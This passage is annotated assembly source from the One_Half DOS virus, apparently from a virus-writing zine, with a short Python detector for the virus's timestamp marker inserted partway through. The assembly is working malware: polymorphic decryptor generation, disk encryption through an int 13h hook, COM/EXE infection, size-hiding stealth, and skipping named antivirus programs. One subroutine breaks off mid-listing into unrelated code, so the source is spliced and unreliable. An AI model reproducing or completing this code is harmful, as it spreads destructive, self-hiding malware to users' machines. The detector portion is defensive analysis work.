;▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
; Diz preparez decode_routine ...
sub_0BDB proc near
mov dx, 2
call random_number ; gimme random_number
mov byte ptr ds:[push_what - p], 0Eh; store push_cs
or dx, dx ; random_number is zero ?
jz short loc_0BEF
mov byte ptr ds:[push_what - p], 16h; nope so store
; push_ss
loc_0BEF:
mov si, offset m_?_i - p ; start with first_phaze
loc_0BF2:
mov dx, 8
call random_number ; gimme random_number
cmp dl, 4 ; we don't need sp_reg
je loc_0BF2
mov bl, dl ; reg 2 bl
call sub_0BA4 ; set instructionz etc.
mov si, offset m_i_? - p ; start with second_phaze
loc_0C05:
mov dx, 3
call random_number ; gimme random_number
add dl, 6
cmp dl, 8
jne short loc_0C15
mov dl, 3 ; yope set bx_reg
loc_0C15:
cmp dl, bl ; xor_reg = index_reg ?
je loc_0C05
call sub_0BA4 ; nope so set instr. etc.
xor cx, cx
mov di, offset decode_routine_table - p
loc_0C21:
cmp cx, 9 ; jnz_instruction ?
jne short loc_0C40
loc_0C26: ; yope
; it'z jnz disp8
; so it must be in the range
; 0 - 80h bytez
mov dx, 0C8h
call random_number ; gimme random_number
sub dx, 64h ; sub 0c8h / 2
add dx, ds:[xor_offset - p] ; add xor_offset
cmp dx, 0 ; less than 0 ?
jl loc_0C26
cmp dx, ds:[max_number - p] ; more or same than max_number?
jge loc_0C26
jmp short loc_0C46
loc_0C40:
db 0bah ; mov dx, ?
max_number dw 466h ; random_max iz max_number
call random_number ; gimme random_number
loc_0C46:
jcxz short loc_0C5F ; first timez here ?
mov si, offset decode_routine_table - p
push cx ; nope
locloop_0C4C: ; so go2 cur_instr and check
; 4 distancez
lodsw
sub ax, dx ; check 4 distance
cmp ax, 0Ah ; more or same than 0ah bytez ?
jge loc_0C5C
cmp ax, 0FFF6h ; less or same than 0ah bytez ?
jle loc_0C5C
pop cx ; nope ! get another random_#
jmp loc_0C21
loc_0C5C: ; yope
loop locloop_0C4C ; so go2 next insrt
pop cx ; last_one
loc_0C5F:
xchg dx, ax ; random_number 2 ax
stosw ; store it 2 decode_...
inc cx ; inc counter
cmp cx, 0Ah ; less than 0ah (10 piecez) ?
jb loc_0C21
; nope = decode_routine_table
; initialized ...
mov bx, offset decode_routine_table - p
mov si, offset instr_start - p
loc_0C6D:
mov di, offset instr_buffer - p
lodsb ; read instr_length
mov cl, al ; instr_length 2 cx
mov dx, 8 ; u_instr 2 dx
sub dx, cx ; sub it
mov ax, [bx+2] ; gimme next_d_entry_offset
; if jnz_instr next iz
; viruz_beginning ...
sub ax, [bx] ; sub from it cur_d_entry
cmp ax, 0Ah ; distance 0ah ?
jne short loc_0C8B
inc dx ; inc u_instr (we don't need
inc dx ; jmp_instr ...)
call sub_0B72
inc bx ; go2 next decode_routine_
inc bx ; _offset
jmp short loc_0CB5 ; and go on
loc_0C8B: ; nope
call random_number ; gimme random_number
call sub_0B72 ; copy instruction 2 buffer ...
mov dx, di ; gimme instr_buffer_offset
sub dx, offset three_bytez - p; sub ofs instr_buffer - 3
add dx, [bx] ; add cur_d_entry
mov al, 0E9h ; far_jmp 2 al
stosb ; store it
inc bx ; go2 next_entry
inc bx
mov ax, [bx] ; gimme it
sub ax, dx ; sub it
cmp ax, 7Eh ; distance more than 7eh ?
jg short loc_0CB4
cmp ax, 0FF7Fh ; distance less than 0ff7fh ?
jl short loc_0CB4
inc ax ; nope inc distance (jmp_short
; only 2 bytez ...)
mov byte ptr [di-1], 0EBh ; store rather jmp_short
stosb ; store disp8
jmp short loc_0CB5 ; and go on
loc_0CB4: ; yope
stosw ; store disp16
loc_0CB5:
push bx
push cx
db 0b9h ; mov cx, 0
mov_cx_?_ dw 0 ; gimme file_pointer
db 0bah ; mov dx, 13h
mov_dx_?_ dw 13h
add dx, [bx-2] ; add decode_table_entry
adc cx, 0 ; (the current)
push cx
push dx
call sub_0E63 ; go2 f_ptr
mov cx, 0Ah ; read 0ah bytez
db 0bah ; mov dx, ?
buffer_offset dw 0a4h ; 2 [buffer_offset]
add ds:[buffer_offset - p], cx; go2 next_buffer_offset_entry
call f_read_
pop dx
pop cx
jc short loc_0CE6 ; error ?
call sub_0E63 ; go back 2 f_ptr
xchg cx, di ; cur_instr_buffer_offset 2 cx
mov dx, offset instr_buffer - p; sub offset instr_buffer
sub cx, dx ; sub it 2 get instr_size
call f_write_ ; and write it ...
loc_0CE6:
pop cx
pop bx
jc short loc_ret_0CF3 ; error ?
db 81h,0FBh ; cmp bx, offset beginning_ofs - p
dw offset beginning_ofs - p
jnc short loc_ret_0CF3 ; last decode_routine_entry ?
jmp loc_0C6D ; nope so go on ...
loc_ret_0CF3: ; yope
retn ; so end ...
sub_0BDB endp
;▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
; SUBROUTINE
;▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
; Diz cryptz_ viruz_body
sub_0D12 proc near
push cx
mov si, dx ; gimme viruz_start_offset
db 0b8h ; mov ax, 0
crypt_viruz dw 0 ; gimme init_crypt_vale
mov cx, offset buffer - p ; gimme viruz_size
locloop_0D1B:
xor [si], ax ; crypt_it
db 05h ; add ax, ?
next_crypt_value dw 0 ; go2 next_crypt_value
inc si ; go2 next viruz_byte
loop locloop_0D1B ; and go on
pop cx
retn ; and end ...
sub_0D12 endp
new_int_24h:
mov al, 3
iret
;▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
; SUBROUTINE
;▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
; Diz callz old_int_13h
sub_0D28 proc near
pushf
call dword ptr cs:[old_int_13h - p__]
retn
sub_0D28 endp
;▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
; SUBROUTINE
;▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
; Diz getz cylinder_number in si
sub_0D2F proc near
push cx
push dx
shr cl, 1
shr cl, 1
and dh, 0C0h
or dh, cl
mov cl, 4
shr dh, cl
mov dl, ch
xchg si, dx
pop dx
pop cx
retn
sub_0D2F endp
;▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
; SUBROUTINE
;▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
; Diz cryptz_ a buffer
crypt_ proc near
push ax
push bx ; push regz
push cx
db 0b0h ; mov al, ?
secz_count db 0 ; gimme secz_count
db 0bbh ; mov bx, ?
buf_ptr dw 0 ; gimme buf_ptr
loc_0D4D:
mov cx, 100h ; do it 256*
; (in wordz)
locloop_0D50:
db 26h, 81h, 37h ; xor word ptr es:[bx], ?
crypt_value dw 2b50h ; xor word ...
inc bx ; go2 next_word in buffer
inc bx
loop locloop_0D50 ; and go on
new_int_13h:
cmp ah, 2 ; read sector(z) ?
je short loc_0D6E
cmp ah, 3 ; write sector(z) ?
je short loc_0D6E
jmp loc_0E50 ; nope so end
loc_0D6E:
cmp dx, 80h ; 0.head, first_harddisk ?
jne short loc_0DE0
test cx, 0FFC0h ; cylinder is null ?
jnz short loc_0DE0
push bx ; ok it could be work with
push dx ; partition_table or with
push si ; viruz_body
push di
push cx
push cx
mov si, ax ; gimme ax_reg
and si, 0FFh ; gimme secz_2_work
mov di, si
mov al, 1
push ax
jz short loc_0DBB ; secz_2_work is null ?
jcxz short loc_0DDB ; sec_number is null ?
cmp cl, 1 ; work with parition_table ?
je short loc_0DCD
loc_0D94: ; nope so it could be viruz
db 80h, 0f9h ; body
max_sektor db 11h ; cmp cl, ?
ja short loc_0DDB ; are we in the range
db 80h, 0f9h ; cmp cl, ?
partition_sec_n db 0ah ; where'z viruz_body ?
jb short loc_0DD2
cmp ah, 3 ; yope = writing ?
je short loc_0DDB ; (end_with error)
push bx
mov cx, 200h ; do it 512*
locloop_0DA7:
mov byte ptr es:[bx], 0 ; store null
inc bx ; inc buffer_ptr
loop locloop_0DA7 ; and go on ...
pop bx
loc_0DAF:
add bx, 200h ; go2 next_sec_in_buffer
pop ax
pop cx
inc cx ; inc sec_number
push cx
push ax
dec si ; dec secz_2_work
jnz loc_0D94 ; null ?
loc_0DBB:
clc
loc_0DBC: ; yope
pop ax ; restore ax_reg
pushf
xchg di, ax ; secz_2_work 2 ax
sub ax, si ; sub secz_that_weren't_read
popf
mov ah, ch ; error number 2 ah
pop cx
pop cx
pop di ; restore regz
pop si
pop dx
pop bx
retf 2 ; and end ...
loc_0DCD:
mov cl, byte ptr cs:[partition_sec_n - p__] ; yope
; so gimme parition_table_sec
loc_0DD2:
call sub_0D28 ; write or read it
mov ch, ah ; gimme possible_error_number
jc loc_0DBC ; error ?
jmp short loc_0DAF ; nope = go on
loc_0DDB: ; yope
stc ; so set up error_flag
mov ch, 0BBh ; and error_number 2 ch
jmp short loc_0DBC ; (undefined_error)
loc_0DE0: ; nope
cmp dl, 80h ; it'z first_harddisk ?
jne short loc_0E50
push ax
push cx
push dx
push si ; push regz
push ds
push cs
pop ds
mov byte ptr ds:[secz_count - p__], 0 ; store null
mov word ptr ds:[buf_ptr - p__], bx ; store bx
call sub_0D2F ; gimme cylinder_number
and cl, 3Fh ; mask sector
and dh, 3Fh ; mask head
loc_0DFE:
or al, al ; secz_2_work is null ?
jz short loc_0E31
db 81h, 0feh ; cmp si, ?
max_cyl_number dw 265h ; are we in the range
jae short loc_0E31 ; where'z harddisk
db 81h, 0feh ; cmp si, ?
cur_cyl_number dw 1234h ; crypted_ ?
jb short loc_0E14
inc byte ptr ds:[secz_count - p__] ; yope inc secz_count
jmp short loc_0E1A
loc_0E14:
add word ptr ds:[buf_ptr - p__], 200h; go2 next_sec_in_buf
loc_0E1A:
dec al ; dec secz_2_work
inc cl
db 80h, 0f9h ; cmp cl, ?
max_sektor_2 db 11h ; sector in range ?
jbe loc_0DFE
mov cl, 1 ; nope so sector 2 1
inc dh ; and inc head
db 80h, 0feh ; cmp dh, ?
max_heads db 07h ; head in range ?
jbe loc_0DFE
xor dh, dh ; nope so head 2 null
inc si ; and inc cylinder
jmp short loc_0DFE ; and go on
loc_0E31: ; yope
cmp byte ptr ds:[secz_count - p__], 0; must we (un)crypt_
pop ds ; something ?
pop si ; restore regz
pop dx
pop cx
pop ax
jz short loc_0E50
cmp ah, 2 ; yope; read ?
je short loc_0E45
call crypt_ ; nope write; crypt_ it
loc_0E45:
call sub_0D28 ; do it
pushf
call crypt_ ; and uncrypt_ it
popf
retf 2
loc_0E50: ; end ...
db 0EAh ; jmp far ptr old_int_13h
old_int_13h label near
;▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
; SUBROUTINE
;▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
; Diz writez 2 file ...
f_write_ proc near
mov ah, 40h
jmp $ + 4
f_write_ endp
;▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
; SUBROUTINE
;▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
; Diz readz from file ...
f_read_ proc near
mov ah, 3Fh ; '?'
call sub_0E6F
jc short loc_ret_0E5E
cmp ax, cx
loc_ret_0E5E:
retn
f_read_ endp
;▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
; SUBROUTINE
;▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
; Diz call f_ptr fc
sub_0E5F proc near
xor cx, cx
mov dx, cx
sub_0E63:
mov ax, 4200h
jmp short loc_0E6F
sub_0E68:
xor cx, cx
mov dx, cx
sub_0E6C:
mov ax, 4202h
sub_0E6F:
loc_0E6F:
mov bx, word ptr cs:[handle - p]
locloop_0FA2:
add [si], dx ; add base
inc si ; go2 next_entry
inc si
loop locloop_0FA2 ; and go on ...
pop bx
cmp byte ptr ds:[exe_flag - p], 0 ; com_file ?
jne short loc_0FD0
mov byte ptr [bx], 0E9h ; store far_jump
mov ax, ds:[decode_routine_table - p]; gimme jump_offset
sub ax, 103h ; sub 103h (100h PSP and 03h
; far_jmp)
mov [bx+1], ax ; store it
mov word ptr ds:[relo_cnt - p], 0; store relo_cnt
mov word ptr ds:[relo_cs - p], 0FFF0h; store relo_cs
mov word ptr ds:[exe_ip - p], 100h; store exe_ip
jmp short loc_0FF7 ; and go on
loc_0FD0: ; nope exe_file
mov [bx+16h], ax ; store relo_cs
mov [bx+0Eh], ax ; store relo_ss
mov ax, ds:[decode_routine_table - p]; gimme starting_ofs
mov [bx+14h], ax ; store exe_ip
add [bx+10h], dx ; add it 2 exe_sp
mov word ptr [bx+6], 0 ; null relo_cnt
mov ax, 28h ; my_min_mem 2 ax
cmp [bx+0Ah], ax ; compare it with min_mem
jae short loc_0FEF ; more ?
mov [bx+0Ah], ax ; yope so store my_min_mem
loc_0FEF:
cmp [bx+0Ch], ax ; compare it with max_mem
jae short loc_0FF7 ; more ?
mov [bx+0Ch], ax ; yope so store my_max_mem
loc_0FF7:
push bx
call sub_0E68 ; go2 eof
db 0e8h ; call presun_rutiny (
; viruz_body_crypt_&_write)
dw offset presun_rutiny - presun_rutiny + buffer - next___
next___ label near ; crypt_ it and write it
loc_0FFE:
jc short loc_1031
call sub_0E68 ; go2 eof
div word ptr ds:[page_size_ - p] ; div new_file_size
inc ax ; 2 count pagez
pop bx
cmp byte ptr ds:[exe_flag - p], 0 ; exe_file ?
je short loc_1016
mov [bx+4], ax ; store new page_cnt
mov [bx+2], dx ; store new part_pag
loc_1016:
push bx
call sub_0E5F ; go2 sof
mov cx, 1Ah
pop dx
call f_write_ ; write new_exe_header 2 file
jc short loc_1031 ; error ?
mov ax, 5701h ; set back file_time_date
mov cx, ds:[file_time_date - p] ; gimme time_stamp
mov dx, ds:[file_time_date - p + 2] ; gimme date_stamp
call sub_0E6F ; set it
loc_1031:
mov sp, bp
retn ; and end ...
sub_0E7C endp
;▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
; SUBROUTINE
;▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
; Diz setz my own error_handler
sub_1034 proc near
push dx
push ds
push cs
pop ds
mov ax, 3524h ; gimme old_int_24h
call int_21h
mov ds:[old_int_24h - p + 2], es ; store it
mov ds:[old_int_24h - p], bx
mov ax, 2524h ; and set my own
mov dx, offset new_int_24h - p__ ; handler
call int_21h
pop ds
pop dx
retn ; and end ...
sub_1034 endp
;▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
; SUBROUTINE
;▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
; Diz setz back old_int_24h
sub_1052 proc near
mov ax, 2524h
lds dx, dword ptr cs:[old_int_24h - p]; gimme old_int_24h
call int_21h ; set it back
retn ; and end ...
sub_1052 endp
;▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
; SUBROUTINE
;▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
; Diz checkz the file_name and drive ...
sub_1098 proc near
push dx
push bx
push cx
push si
push di ; push regz
push ds
push es
push ax
mov si, dx ; gimme file_name_offset
mov di, name_buffer - p ; gimme buffer where 2 store
push cs
pop es
lea bx, [di-1]
mov cx, 4Bh ; try it 4bh*
locloop_10AD:
lodsb ; read byte
cmp al, 61h ; 'a'
jb short loc_10B8 ; low_case ?
cmp al, 7Ah ; 'z'
ja short loc_10B8
sub al, 20h ; yope so make high_case
loc_10B8:
push ax
push si
loc_10BA: ; nope
cmp al, 20h ; space ?
jne short loc_10C7
lodsb ; read byte
or al, al ; null ?
jnz loc_10BA
pop si ; yope
pop si
jmp short loc_10D7 ; end ...
loc_10C7:
pop si
pop ax
cmp al, 5Ch ; '\'
je short loc_10D5
cmp al, 2Fh ; '/'
je short loc_10D5
cmp al, 3Ah ; ':'
jne short loc_10D7
loc_10D5:
mov bx, di ; store offset 2 bx
loc_10D7:
stosb ; store byte
or al, al ; null ?
jz short loc_10DE
loop locloop_10AD ; and go on
loc_10DE: ; yope
mov si, offset _com_ - p ; check 4 .COM or .EXE
sub di, 5 ; sub 5 (.XXX, 0)
push cs
pop ds
call sub_1149 ; it'z .COM ?
jz short loc_10F0
call sub_1149 ; it'z .EXE ?
jnz short loc_113C
loc_10F0: ; yope
pop ax
push ax
xchg di, bx ; gimme file_name_offset
inc di ; inc it (/, \, or : ...)
cmp ax, 4B00h ; fc run file ?
jne short loc_1107
mov si, offset _chkdsk_ - p
call sub_1149 ; do we run CHKDISK ?
jnz short loc_1107
mov byte ptr ds:[fcb_jmp_ - p], offset loc_121a - (fcb_jmp_ + 1)
; yope so turn off fcb_sub_viruz_size
loc_1107:
mov cx, 7 ; check 4 7 antivirusez
mov si, offset _scan_ - p ; start with SCAN
locloop_110D:
push cx
call sub_1149 ; compare name
pop cx
jz short loc_113C ; it'z antiviruz ?
loop locloop_110D ; nope go on
;▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
; SUBROUTINE
;▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
; Diz comparez 2 stringz
sub_1149 proc near
push di
lodsb ; gimme bytez_count
mov cl, al ; store it 2 cx
mov ax, si ; gimme si
add ax, cx ; add bytez_count 2 offset
repe cmpsb ; compare
mov si, ax ; store new_offset
pop di
retn ; and end ...
sub_1149 endp
;▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
; SUBROUTINE
;▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
; Diz checkz whether there'z a viruz in the file or not ...
; and if not returnz in ax the value which iz 4 infected
sub_1157 proc near
push dx
mov ax, es:[bx+2] ; gimme date
xor dx, dx
div word ptr cs:[date_div-p]; div it
mov ax, es:[bx] ; gimme time
and al, 1Fh ; and it
cmp al, dl ; the same ?
stc ; set Cflag (infected)
jz short loc_1176
mov ax, es:[bx] ; gimme time
and ax, 0FFE0h ; and it
or al, dl ; or it with date
clc ; clear Cflag (not infected)
loc_1176:
pop dx
retn ; and end ...
sub_1157 endp
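A scanner-side mirror of sub_1157 (an added example, not Ratter's or the virus's code): the routine divides the DOS date word by date_div (1Eh) and compares the remainder with the 5-bit 2-second field of the DOS time word, treating a match as "already infected" and otherwise returning the time word the virus will stamp on the file. The directory entries below are constructed; when the virus is resident its int 21h hook adjusts what find-first/find-next return, so such entries should be collected from a clean boot.

```python
"""Recognise One_Half's infection marker in DOS directory timestamps.

Added example (not from the zine). Marked file: (time & 1Fh) == (date mod 1Eh),
which is exactly the test sub_1157 performs before setting the carry flag.
"""
DATE_DIV = 0x1E          # date_div from the listing
SECONDS_MASK = 0x1F      # low 5 bits of the DOS time word (seconds / 2)


def dos_date(year: int, month: int, day: int) -> int:
    """Pack a calendar date the way a DOS directory entry stores it."""
    return ((year - 1980) << 9) | (month << 5) | day


def dos_time(hour: int, minute: int, second: int) -> int:
    """Pack a time of day the way a DOS directory entry stores it (2-second units)."""
    return (hour << 11) | (minute << 5) | (second // 2)


def is_one_half_marked(time_word: int, date_word: int) -> bool:
    """Mirror of sub_1157's carry flag: True when the entry carries the marker."""
    return (time_word & SECONDS_MASK) == (date_word % DATE_DIV)


def one_half_stamp(time_word: int, date_word: int) -> int:
    """The ax value sub_1157 returns for a clean file: the seconds field is
    replaced by date mod 30, so the file will test as marked from then on."""
    return (time_word & 0xFFE0) | (date_word % DATE_DIV)


def suspicious_entries(entries: list) -> list:
    """Filter (name, time_word, date_word) triples down to names carrying the marker.

    A clean file matches by chance about one time in thirty, so a hit is a lead
    to confirm with other indicators, not proof of infection on its own.
    """
    return [name for name, t, d in entries if is_one_half_marked(t, d)]


# Constructed directory entries (not real samples).
SAMPLE_ENTRIES = [
    ('COMMAND.COM', dos_time(12, 30, 50), dos_date(1994, 5, 17)),   # seconds field 25 == date mod 30
    ('EDIT.COM',    dos_time(12, 30, 20), dos_date(1994, 5, 17)),   # seconds field 10, no match
    ('GAME.EXE',    dos_time(8, 0, 0),    dos_date(1993, 1, 30)),   # seconds field 0, date mod 30 == 28
]

if __name__ == '__main__':
    for name in suspicious_entries(SAMPLE_ENTRIES):
        print(f'{name}: timestamp carries the One_Half marker')
```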
;▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
; SUBROUTINE
;▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
; Sub viruz_size
sub_1178 proc near
sub word ptr es:[bx], offset buffer - p; sub viruz_file
sbb word ptr es:[bx+2], 0
jnc short loc_ret_118E ; underflow ?
add word ptr es:[bx], offset buffer - p; yope
adc word ptr es:[bx+2], 0 ; so add it back
loc_ret_118E:
retn
sub_1178 endp
;▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
; SUBROUTINE
;▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
; Diz iz main infection routine ...
sub_118F proc near
push ax
push bx
push cx
push si ; push regz
push di
push bp
push ds
push es
call sub_1034 ; set my int_24h
mov ax, 4300h ; gimme file_attribz
call int_21h
mov cs:[file_attribz - p], cx; store it
mov ax, 4301h ; set new attribz
xor cx, cx ; no attribz
call int_21h
jc short loc_11D3 ; error ?
mov ax, 3D02h ; open file 4 read_&_write
call int_21h
jc short loc_11CA ; error ?
push dx
push ds
push cs
pop ds
push cs
pop es
mov ds:[handle - p], ax ; store handle
call sub_0E7C ; ok infect the file
mov ah, 3Eh
call sub_0E6F ; close file
pop ds
pop dx
loc_11CA:
mov ax, 4301h ; set back old_attribz
db 0b9h ; mov cx, ?
file_attribz dw 20h
call int_21h
loc_11D3:
call sub_1052 ; set back old_int_24h
pop es
pop ds
pop bp
pop di
pop si ; restore regz
pop cx
pop bx
pop ax
retn ; and end ...
sub_118F endp
new_int_21h:
pushf
sti
cmp ah, 11h ; find_first_FCB_file ?
je short loc_11EB
cmp ah, 12h ; find next_FCB_file ?
jne short loc_121A
loc_11EB:
db 0ebh
fcb_jmp_ db 0
push bx
push es
push ax
mov ah, 2Fh ; gimme DTA_addr
call int_21h
pop ax
call int_21h ; do FCB_function
cmp al, 0FFh ; did we find something ?
je short loc_1216
push ax ; yope
cmp byte ptr es:[bx], 0FFh ; extended FCB ?
jne short loc_1207
add bx, 7 ; yope so jump over ext_FCB
loc_1207:
add bx, 17h ; go2 time
call sub_1157 ; check whether infected
pop ax
jnc short loc_1216 ; already infected ?
add bx, 6 ; go2 file_size
call sub_1178 ; sub viruz_size
loc_1216: ; nope
pop es
pop bx
popf
iret
loc_121A:
cmp ah, 4Eh ; find_first_file ?
je short loc_1224
cmp ah, 4Fh ; find_next_file ?
jne short loc_1250
loc_1224:
push bx
push es
push ax
mov ah, 2Fh ; gimme DTA_addr
call int_21h
pop ax
call int_21h ; do find_function
jc short loc_1249 ; error ?
push ax
add bx, 16h ; go2 time
call sub_1157 ; check whether infected
pop ax
jnc short loc_1242 ; already infected ?
add bx, 4 ; go2 file_size
call sub_1178 ; sub viruz_size
loc_1242: ; nope
pop es
pop bx ; restore regz
popf
clc ; clear error_flag
retf 2 ; and end ...
loc_1249: ; yope
pop es
pop bx ; restore regz
popf
stc ; set error_flag
retf 2 ; and end ...
loc_1250:
cmp ax, 4B53h ; it'z mark ?
jne short loc_125A
mov ax, 454Bh ; yope so get 454bh
popf
iret ; and end ...
loc_125A:
cmp ah, 4Ch ; prog'z_end ?
jne short loc_1265
mov byte ptr cs:[fcb_jmp_ - p], 0
loc_1265:
cld
push dx
